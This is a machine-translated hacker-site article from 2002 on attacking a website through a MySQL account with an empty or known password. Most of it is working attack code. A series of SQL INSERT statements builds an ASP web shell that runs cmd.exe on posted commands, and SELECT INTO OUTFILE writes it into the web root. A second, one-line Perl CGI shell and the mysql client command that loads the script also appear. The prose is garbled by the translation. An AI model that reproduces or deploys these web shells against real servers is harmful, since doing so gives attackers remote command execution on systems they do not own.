Carries on using the mysql spatial password attacks |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  The hacker file>>invasion analysis>> carries on the attack 
                  using the mysql spatial password  Printing

            Carries on the attack using the mysql spatial password
            Www.cshu.net  2002-8-18  fog rain village 

              One day, suddenly obtains a website the mysql account number, and 
              looks up its main page in the position is c:\www\www, first 
              on-line downloads a cmd.asp procedure, then writes a cmd.sql 
              procedure in order to carries on the connection, passes on as 
              follows to its table of contents, the cmd.sql content cmd.asp on: 
              Use test; 
              Create table tmp (cmd TEXT); 
              Insert into tmp values ("<%@ Language=VBScript %>"); 
              Insert into tmp values ("<%"); 
              Insert into tmp values ("Dim oScript"); 
              Insert into tmp values ("Dim oScriptNet"); 
              Insert into tmp values ("Dim oFileSys, oFile"); 
              Insert into tmp values ("Dim szCMD, szTempFile"); 
              Insert into tmp values ("On Error Resume Next"); 
              Insert into tmp values ("' -- create the COM objects that we will 
              be using -- '"); 
              Insert into tmp values ('Set oScript = Server.CreateObject 
              ("WSCRIPT.SHELL") '); 
              Insert into tmp values ('Set oScriptNet = Server.CreateObject 
              ("WSCRIPT.NETWORK") '); 
              Insert into tmp values ('Set oFileSys = Server.CreateObject 
              ("Scripting.FileSystemObject") '); 
              Insert into tmp values ("' -- check for a command that we have 
              posted -- '"); 
              Insert into tmp values ('szCMD = Request.Form ("CMD") '); 
              Insert into tmp values ('If (szCMD "") Then'); 
              Insert into tmp values ("' -- Use a poor mans pipe... a temp file 
              -- '"); 
              Insert into tmp values ('szTempFile = "C:\" & oFileSys.GetTempName 
              () '); 
              Insert into tmp values ('Call oScript.Run ("cmd.exe /c" & szCMD & 
              ">" & szTempFile, 0, True) '); 
              Insert into tmp values ('Set oFile = oFileSys.OpenTextFile 
              (szTempFile, 1, False, 0) '); 
              Insert into tmp values ("End If"); 
              Insert into tmp values ("%>"); 
              Insert into tmp values ("<HTML>"); 
              Insert into tmp values ("<BODY>"); 
              Insert into tmp values ('<FORM action= "<%= 
              Request.ServerVariables ("URL") %>" method= "POST" >'); 
              Insert into tmp values ('<input type=text name= "CMD" size=45 
              value= "<%= szCMD %>" >'); 
              Insert into tmp values ('<input type=submit value= "Run" >'); 
              Insert into tmp values ("</FORM>"); 
              Insert into tmp values ("<PRE>"); 
              Insert into tmp values ('<%= "\\" & oScriptNet.ComputerName & "\" 
              & oScriptNet.UserName %>'); 
              Insert into tmp values ("<br>"); 
              Insert into tmp values ("<%"); 
              Insert into tmp values ("If (IsObject (oFile)) Then"); 
              Insert into tmp values ("' -- Read the output from our command and 
              remove the temp file -- '"); 
              Insert into tmp values ("On Error Resume Next"); 
              Insert into tmp values ("Response.Write Server.HTMLEncode 
              (oFile.ReadAll)"); 
              Insert into tmp values ("oFile.Close"); 
              Insert into tmp values ("Call oFileSys.DeleteFile (szTempFile, 
              True)"); 
              Insert into tmp values ("End If"); 
              Insert into tmp values ("%>"); 
              Insert into tmp values ("</BODY>"); 
              Insert into tmp values ("</HTML>"); 
              Select * from tmp into outfile "c:\\www\\www\\234.asp"; 
              Drop table tmp; 
              When uses insert into toward the outside and inside increase 
              content, cannot only use insert into the content completely to 
              increase, takes a line of line of Canada, otherwise can appear the 
              mistake, therefore each line all must have insert into. 
              Then carries on the connection: 
              C:\mysql\bin\mysql -u user -p password -h ip <cmd.sql 
              If becomes: 
              C:\mysql\bin\ 
              Then indicated establishes the asp document to be successful! 
              Then: 
              Http:\\www.xxx.com/234.asp 
              Then was allowed to obtain a average consumer shell! First step 
              has succeeded, becomes the super user not to be able to be the 
              difficult matter! 
              If passed on the CGI document through mysql on not to use that 
              lengthy, cmd.sql: 
              Use test; 
              Create table tmp (cmd TEXT); 
              Insert into tmp values ('system @ARGV'); 
              Select * from tmp into outfile "c:\\www\\www\\234.cgi"; 
              Drop table tmp; 
              Then may pass http:\\www.xxx.com/234.cgi? Dir c:\, similarly also 
              obtained average consumer's shell! 



              Original author: N/A 
              Origin: The small phoenix occupies 
              Altogether has 57 readers to read this article 

              [Tells friend] 
            Previous article:Not in system root table of contents automatic 
            batch run 

            Next article:How carries on the attack to in the PHP procedure 
            common loophole (on) 

            - this week popular article - related article 
            The MySQL database safe disposition/practical skill comes inside and 
            outside concurrently to repair
            Carries on the attack using the mysql spatial password



      CSHU 
